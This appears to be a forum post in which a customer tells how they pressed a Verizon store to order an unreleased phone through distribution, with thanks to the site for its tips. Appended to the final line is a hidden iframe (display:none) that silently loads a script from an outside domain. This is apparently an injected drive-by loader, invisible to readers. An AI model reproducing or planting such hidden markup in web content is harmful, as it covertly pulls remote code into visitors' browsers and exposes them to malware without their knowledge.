Ok so I went into my Verizon store (who has had me calling every Thursday/delivery day for the last three weeks) and told them I KNEW they could order it through distribution and have it delivered in my hot little hands in two days. The nice sales guy denied it to be true and said it was to be in the stores on the 17th but only available for business sales before then. I again INSISTED I KNEW he could order it through distribution so he went back and spoke with his manager who agreed to do it. My phone is scheduled to be at my home on Friday!!!!!! BTW - another sales guy in the store (who I have been speaking with every week) said he had heard they could do this but he felt it was better to wait until the phone was physically at the store.

Anyway, as I was leaving some of the other sales guys started calling some of their customers who have been waiting to tell them they could now order it for them through distribution.

THANK YOU SmartPhoneSource for all the tips over the last year!! I can't wait to hold this %$# thing!!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>